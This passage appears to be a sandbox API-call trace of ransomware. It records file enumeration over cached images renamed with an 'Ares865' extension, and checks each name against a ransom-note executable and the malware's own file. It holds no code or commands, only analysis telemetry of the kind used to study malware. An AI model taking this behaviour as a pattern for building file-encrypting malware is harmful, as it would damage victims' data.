nFileSizeLow=0xcc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBPK5J[1].jpg.Ares865", cAlternateFileName="BBBPK5~1.ARE")) returned 1 [0110.911] lstrcmpiW (lpString1="BBBPK5J[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.911] lstrcmpiW (lpString1="BBBPK5J[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.912] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBPK5J[1].jpg.Ares865" | out: lpString1="BBBPK5J[1].jpg.Ares865") returned="BBBPK5J[1].jpg.Ares865" [0110.912] lstrlenW (lpString="BBBPK5J[1].jpg.Ares865") returned 22 [0110.912] lstrlenW (lpString="Ares865") returned 7 [0110.912] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.912] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53194530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53194530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5425e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x19a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBPMvJ[1].jpg.Ares865", cAlternateFileName="BBBPMV~1.ARE")) returned 1 [0110.912] lstrcmpiW (lpString1="BBBPMvJ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.912] lstrcmpiW (lpString1="BBBPMvJ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.912] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBPMvJ[1].jpg.Ares865" | out: lpString1="BBBPMvJ[1].jpg.Ares865") returned="BBBPMvJ[1].jpg.Ares865" [0110.912] lstrlenW (lpString="BBBPMvJ[1].jpg.Ares865") returned 22 [0110.912] lstrlenW (lpString="Ares865") returned 7 [0110.912] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.912] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x539e9230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x539e9230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a568740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBUL3E[1].jpg.Ares865", cAlternateFileName="BBBUL3~1.ARE")) returned 1 [0110.912] lstrcmpiW (lpString1="BBBUL3E[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.912] lstrcmpiW (lpString1="BBBUL3E[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.912] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBUL3E[1].jpg.Ares865" | out: lpString1="BBBUL3E[1].jpg.Ares865") returned="BBBUL3E[1].jpg.Ares865" [0110.912] lstrlenW (lpString="BBBUL3E[1].jpg.Ares865") returned 22 [0110.912] lstrlenW (lpString="Ares865") returned 7 [0110.912] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.912] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x515e8570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x515e8570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a58e8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBUqkT[1].jpg.Ares865", cAlternateFileName="BBBUQK~1.ARE")) returned 1 [0110.912] lstrcmpiW (lpString1="BBBUqkT[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.912] lstrcmpiW (lpString1="BBBUqkT[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.913] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBUqkT[1].jpg.Ares865" | out: lpString1="BBBUqkT[1].jpg.Ares865") returned="BBBUqkT[1].jpg.Ares865" [0110.913] lstrlenW (lpString="BBBUqkT[1].jpg.Ares865") returned 22 [0110.913] lstrlenW (lpString="Ares865") returned 7 [0110.913] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.913] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52f59090, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52f59090, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a58e8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBUqkT[2].jpg.Ares865", cAlternateFileName="BBBUQK~2.ARE")) returned 1 [0110.913] lstrcmpiW (lpString1="BBBUqkT[2].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.913] lstrcmpiW (lpString1="BBBUqkT[2].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.913] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBUqkT[2].jpg.Ares865" | out: lpString1="BBBUqkT[2].jpg.Ares865") returned="BBBUqkT[2].jpg.Ares865" [0110.913] lstrlenW (lpString="BBBUqkT[2].jpg.Ares865") returned 22 [0110.913] lstrlenW (lpString="Ares865") returned 7 [0110.913] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.913] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x530afcf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x530afcf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a58e8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBX3z0[1].jpg.Ares865", cAlternateFileName="BBBX3Z~1.ARE")) returned 1 [0110.913] lstrcmpiW (lpString1="BBBX3z0[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.913] lstrcmpiW (lpString1="BBBX3z0[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.913] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBX3z0[1].jpg.Ares865" | out: lpString1="BBBX3z0[1].jpg.Ares865") returned="BBBX3z0[1].jpg.Ares865" [0110.913] lstrlenW (lpString="BBBX3z0[1].jpg.Ares865") returned 22 [0110.913] lstrlenW (lpString="Ares865") returned 7 [0110.913] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.913] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x538b8730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x538b8730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5b4a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBYEW1[1].jpg.Ares865", cAlternateFileName="BBBYEW~1.ARE")) returned 1 [0110.913] lstrcmpiW (lpString1="BBBYEW1[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.913] lstrcmpiW (lpString1="BBBYEW1[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.913] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBYEW1[1].jpg.Ares865" | out: lpString1="BBBYEW1[1].jpg.Ares865") returned="BBBYEW1[1].jpg.Ares865" [0110.914] lstrlenW (lpString="BBBYEW1[1].jpg.Ares865") returned 22 [0110.914] lstrlenW (lpString="Ares865") returned 7 [0110.914] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.914] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52ec0b10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52ec0b10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5b4a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1cd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBYfEH[1].jpg.Ares865", cAlternateFileName="BBBYFE~1.ARE")) returned 1 [0110.914] lstrcmpiW (lpString1="BBBYfEH[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.914] lstrcmpiW (lpString1="BBBYfEH[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.914] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBYfEH[1].jpg.Ares865" | out: lpString1="BBBYfEH[1].jpg.Ares865") returned="BBBYfEH[1].jpg.Ares865" [0110.914] lstrlenW (lpString="BBBYfEH[1].jpg.Ares865") returned 22 [0110.914] lstrlenW (lpString="Ares865") returned 7 [0110.914] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.914] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b2bd440, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5b2bd440, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5b4a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2fb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBZ20W[1].jpg.Ares865", cAlternateFileName="BBBZ20~1.ARE")) returned 1 [0110.914] lstrcmpiW (lpString1="BBBZ20W[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.914] lstrcmpiW (lpString1="BBBZ20W[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.914] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBZ20W[1].jpg.Ares865" | out: lpString1="BBBZ20W[1].jpg.Ares865") returned="BBBZ20W[1].jpg.Ares865" [0110.914] lstrlenW (lpString="BBBZ20W[1].jpg.Ares865") returned 22 [0110.914] lstrlenW (lpString="Ares865") returned 7 [0110.914] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.914] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53950cb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53950cb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5b4a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBzaxY[1].jpg.Ares865", cAlternateFileName="BBBZAX~1.ARE")) returned 1 [0110.914] lstrcmpiW (lpString1="BBBzaxY[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.914] lstrcmpiW (lpString1="BBBzaxY[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.914] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBzaxY[1].jpg.Ares865" | out: lpString1="BBBzaxY[1].jpg.Ares865") returned="BBBzaxY[1].jpg.Ares865" [0110.915] lstrlenW (lpString="BBBzaxY[1].jpg.Ares865") returned 22 [0110.915] lstrlenW (lpString="Ares865") returned 7 [0110.915] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.915] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53063a30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53063a30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5dab60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBZzuz[1].jpg.Ares865", cAlternateFileName="BBBZZU~1.ARE")) returned 1 [0110.915] lstrcmpiW (lpString1="BBBZzuz[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.915] lstrcmpiW (lpString1="BBBZzuz[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.915] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBZzuz[1].jpg.Ares865" | out: lpString1="BBBZzuz[1].jpg.Ares865") returned="BBBZzuz[1].jpg.Ares865" [0110.915] lstrlenW (lpString="BBBZzuz[1].jpg.Ares865") returned 22 [0110.915] lstrlenW (lpString="Ares865") returned 7 [0110.915] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.915] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5530da90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5530da90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a600cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC03B1[1].jpg.Ares865", cAlternateFileName="BBC03B~1.ARE")) returned 1 [0110.915] lstrcmpiW (lpString1="BBC03B1[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.915] lstrcmpiW (lpString1="BBC03B1[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.915] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC03B1[1].jpg.Ares865" | out: lpString1="BBC03B1[1].jpg.Ares865") returned="BBC03B1[1].jpg.Ares865" [0110.915] lstrlenW (lpString="BBC03B1[1].jpg.Ares865") returned 22 [0110.915] lstrlenW (lpString="Ares865") returned 7 [0110.915] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.915] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51256470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51256470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a600cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC04o2[1].jpg.Ares865", cAlternateFileName="BBC04O~1.ARE")) returned 1 [0110.915] lstrcmpiW (lpString1="BBC04o2[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.915] lstrcmpiW (lpString1="BBC04o2[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.915] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC04o2[1].jpg.Ares865" | out: lpString1="BBC04o2[1].jpg.Ares865") returned="BBC04o2[1].jpg.Ares865" [0110.915] lstrlenW (lpString="BBC04o2[1].jpg.Ares865") returned 22 [0110.916] lstrlenW (lpString="Ares865") returned 7 [0110.916] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.916] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53657130, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53657130, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a600cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC06ZQ[1].jpg.Ares865", cAlternateFileName="BBC06Z~1.ARE")) returned 1 [0110.916] lstrcmpiW (lpString1="BBC06ZQ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.916] lstrcmpiW (lpString1="BBC06ZQ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.916] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC06ZQ[1].jpg.Ares865" | out: lpString1="BBC06ZQ[1].jpg.Ares865") returned="BBC06ZQ[1].jpg.Ares865" [0110.916] lstrlenW (lpString="BBC06ZQ[1].jpg.Ares865") returned 22 [0110.916] lstrlenW (lpString="Ares865") returned 7 [0110.916] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.916] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b2bd440, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5b2bd440, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a626e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0ALC[1].jpg.Ares865", cAlternateFileName="BBC0AL~1.ARE")) returned 1 [0110.916] lstrcmpiW (lpString1="BBC0ALC[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.916] lstrcmpiW (lpString1="BBC0ALC[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.916] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0ALC[1].jpg.Ares865" | out: lpString1="BBC0ALC[1].jpg.Ares865") returned="BBC0ALC[1].jpg.Ares865" [0110.916] lstrlenW (lpString="BBC0ALC[1].jpg.Ares865") returned 22 [0110.916] lstrlenW (lpString="Ares865") returned 7 [0110.916] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.916] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e74850, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e74850, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a626e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0BiZ[1].jpg.Ares865", cAlternateFileName="BBC0BI~1.ARE")) returned 1 [0110.916] lstrcmpiW (lpString1="BBC0BiZ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.916] lstrcmpiW (lpString1="BBC0BiZ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.916] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0BiZ[1].jpg.Ares865" | out: lpString1="BBC0BiZ[1].jpg.Ares865") returned="BBC0BiZ[1].jpg.Ares865" [0110.916] lstrlenW (lpString="BBC0BiZ[1].jpg.Ares865") returned 22 [0110.917] lstrlenW (lpString="Ares865") returned 7 [0110.917] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.917] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52f0cdd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52f0cdd0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a626e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x37e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0FXU[1].jpg.Ares865", cAlternateFileName="BBC0FX~1.ARE")) returned 1 [0110.917] lstrcmpiW (lpString1="BBC0FXU[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.917] lstrcmpiW (lpString1="BBC0FXU[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.917] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0FXU[1].jpg.Ares865" | out: lpString1="BBC0FXU[1].jpg.Ares865") returned="BBC0FXU[1].jpg.Ares865" [0110.917] lstrlenW (lpString="BBC0FXU[1].jpg.Ares865") returned 22 [0110.917] lstrlenW (lpString="Ares865") returned 7 [0110.917] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.917] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61282d80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61282d80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a64cf80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x32e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0FXU[2].jpg.Ares865", cAlternateFileName="BBC0FX~2.ARE")) returned 1 [0110.917] lstrcmpiW (lpString1="BBC0FXU[2].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.917] lstrcmpiW (lpString1="BBC0FXU[2].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.917] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0FXU[2].jpg.Ares865" | out: lpString1="BBC0FXU[2].jpg.Ares865") returned="BBC0FXU[2].jpg.Ares865" [0110.917] lstrlenW (lpString="BBC0FXU[2].jpg.Ares865") returned 22 [0110.917] lstrlenW (lpString="Ares865") returned 7 [0110.917] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.917] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e28590, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e28590, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a64cf80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2cd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0mkg[1].jpg.Ares865", cAlternateFileName="BBC0MK~1.ARE")) returned 1 [0110.917] lstrcmpiW (lpString1="BBC0mkg[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.917] lstrcmpiW (lpString1="BBC0mkg[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.917] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0mkg[1].jpg.Ares865" | out: lpString1="BBC0mkg[1].jpg.Ares865") returned="BBC0mkg[1].jpg.Ares865" [0110.917] lstrlenW (lpString="BBC0mkg[1].jpg.Ares865") returned 22 [0110.918] lstrlenW (lpString="Ares865") returned 7 [0110.918] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.918] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e9a9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e9a9b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a64cf80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0mkg[2].jpg.Ares865", cAlternateFileName="BBC0MK~2.ARE")) returned 1 [0110.918] lstrcmpiW (lpString1="BBC0mkg[2].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.918] lstrcmpiW (lpString1="BBC0mkg[2].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.918] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0mkg[2].jpg.Ares865" | out: lpString1="BBC0mkg[2].jpg.Ares865") returned="BBC0mkg[2].jpg.Ares865" [0110.918] lstrlenW (lpString="BBC0mkg[2].jpg.Ares865") returned 22 [0110.918] lstrlenW (lpString="Ares865") returned 7 [0110.918] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.918] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5127c5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5127c5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a64cf80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0oQi[1].jpg.Ares865", cAlternateFileName="BBC0OQ~1.ARE")) returned 1 [0110.918] lstrcmpiW (lpString1="BBC0oQi[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.918] lstrcmpiW (lpString1="BBC0oQi[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.918] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0oQi[1].jpg.Ares865" | out: lpString1="BBC0oQi[1].jpg.Ares865") returned="BBC0oQi[1].jpg.Ares865" [0110.918] lstrlenW (lpString="BBC0oQi[1].jpg.Ares865") returned 22 [0110.918] lstrlenW (lpString="Ares865") returned 7 [0110.918] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.918] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fa5350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fa5350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a6730e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0tCi[1].jpg.Ares865", cAlternateFileName="BBC0TC~1.ARE")) returned 1 [0110.918] lstrcmpiW (lpString1="BBC0tCi[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.918] lstrcmpiW (lpString1="BBC0tCi[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.918] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0tCi[1].jpg.Ares865" | out: lpString1="BBC0tCi[1].jpg.Ares865") returned="BBC0tCi[1].jpg.Ares865" [0110.918] lstrlenW (lpString="BBC0tCi[1].jpg.Ares865") returned 22 [0110.919] lstrlenW (lpString="Ares865") returned 7 [0110.919] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.919] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459f9950, 